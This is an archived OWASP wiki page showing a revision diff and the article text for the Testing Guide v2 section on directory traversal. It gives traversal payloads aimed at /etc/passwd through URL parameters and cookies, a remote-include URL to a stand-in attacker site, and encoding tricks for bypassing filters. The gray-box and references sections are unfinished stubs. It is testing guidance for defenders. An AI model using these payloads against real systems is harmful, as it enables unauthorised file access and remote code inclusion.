This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Testing for Directory Traversal"

From OWASP
Jump to: navigation, search
(Description of the Issue)
(Black Box testing and example)
Line 25: Line 25:
  
 
== Black Box testing and example ==
 
== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' <br>
+
('''a''') '''Input Vectors Enumeration'''<br>
...<br>
+
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.
'''Result Expected:'''<br>
+
 
...<br><br>
+
Examples of checks to be performed at this stage include:
 +
 
 +
* Do you notice some parameters which you could recognize as file related into HTTP requests?
 +
* Strange file extension?
 +
* Curious variable name? 
 +
<pre>
 +
http://example.com/getUserProfile.jsp?item=ikki.html
 +
http://example.com/index.php?file=content
 +
http://example.com/main.cgi?home=index.htm
 +
</pre>
 +
 
 +
* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?
 +
 
 +
<pre>
 +
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
 +
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
 +
</pre>
 +
<br>
 +
 
 +
('''b''') '''Exploit Techniques'''
 +
 
 +
As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.
 +
 
 +
Using the previous examples:
 +
 
 +
The dynamic page called ''getUserProfile.jsp'' is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
 +
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.
 +
 
 +
To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.
 +
 +
<pre>
 +
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
 +
</pre>
 +
 
 +
For the cookies example, we have:
 +
<pre>
 +
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
 +
</pre>
 +
 
 +
It's also possible to include files (''scripts too!'') located on external website. Let's see:
 +
<pre>
 +
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
 +
</pre>
 +
 
 +
The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
 +
<pre>
 +
http://example.com/main.cgi?home=main.cgi
 +
</pre>
 +
 
 +
The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
 +
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.
 +
 
 +
It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
 +
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.
 +
 +
Each operating system use different chars as path separator:
 +
 +
''Unix-like os'':
 +
<pre>
 +
"/" root directory
 +
"/" directory separator
 +
</pre>
 +
 
 +
''Windows os'':
 +
<pre>
 +
"<drive letter>:\" root directory
 +
"\" but also "/" directory separator
 +
</pre>
 +
(Usually on Win, the directory traversal attack is limited to a single partition)
 +
 
 +
''Classic Mac os'':
 +
<pre>
 +
"<drive letter>:" root directory
 +
":" directory separator
 +
</pre>
 +
<br>
 +
We should take in account the following chars encoding:
 +
 
 +
* URL encoding e double URL encoding
 +
 
 +
<pre>
 +
%2e%2e%2f represents ../
 +
%2e%2e/ represents ../
 +
..%2f represents ../
 +
%2e%2e%5c represents ..\
 +
%2e%2e\ represents ..\
 +
..%5c represents ..\
 +
%252e%252e%255c represents ..\
 +
..%255c represents ..\ and so on.
 +
</pre>
 +
 
 +
* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)
 +
 
 +
<pre>
 +
..%c0%af represents ../
 +
..%c1%9c represents ..\
 +
</pre>
 +
 
 
== Gray Box testing and example ==  
 
== Gray Box testing and example ==  
 
'''Testing for Topic X vulnerabilities:'''<br>
 
'''Testing for Topic X vulnerabilities:'''<br>

Revision as of 09:48, 6 November 2006

OWASP Testing Guide v2 Table of Contents

Brief Summary

Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.

Description of the Issue

Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources. Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application. The definition of the privileges is made using Access Control Lists (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server. These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common /etc/passwd into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the dot-dot-slash attack (../), path traversal, directory climbing, backtracking.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:

  • (a) Input Vectors Enumeration (a systematical evaluation of each input vector)
  • (b) Exploiting Techniques (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability).


Black Box testing and example

(a) Input Vectors Enumeration
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient validation/sanitization process, also for the directory traversal is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

  • Do you notice some parameters which you could recognize as file related into HTTP requests?
  • Strange file extension?
  • Curious variable name?
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
  • Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed


(b) Exploit Techniques

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous examples:

The dynamic page called getUserProfile.jsp is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "../../../../etc/passwd" to include the password hash file of a Linux/Unix system. Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

For the cookies example, we have:

Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd

It's also possible to include files (scripts too!) located on external website. Let's see:

http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.

http://example.com/main.cgi?home=main.cgi

The component called "main.cgi" is located into the same directory of the normal HTML static files used by the application. Sometimes, when the attackers are not so lucky, they need to use special chars (like the "." dot, "%00" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding. During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

Unix-like os:

"/" root directory
"/" directory separator

Windows os:

"<drive letter>:\" root directory 
"\" but also "/" directory separator

(Usually on Win, the directory traversal attack is limited to a single partition)

Classic Mac os:

"<drive letter>:" root directory
":" directory separator


We should take in account the following chars encoding:

  • URL encoding e double URL encoding
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
  • Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)
..%c0%af represents ../
..%c1%9c represents ..\

Gray Box testing and example

Testing for Topic X vulnerabilities:
...
Result Expected:
...

References

Whitepapers
...
Tools
...


OWASP Testing Guide v2

Here is the OWASP Testing Guide v2 Table of Contents OWASP Testing Guide v2 Table of Contents

This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.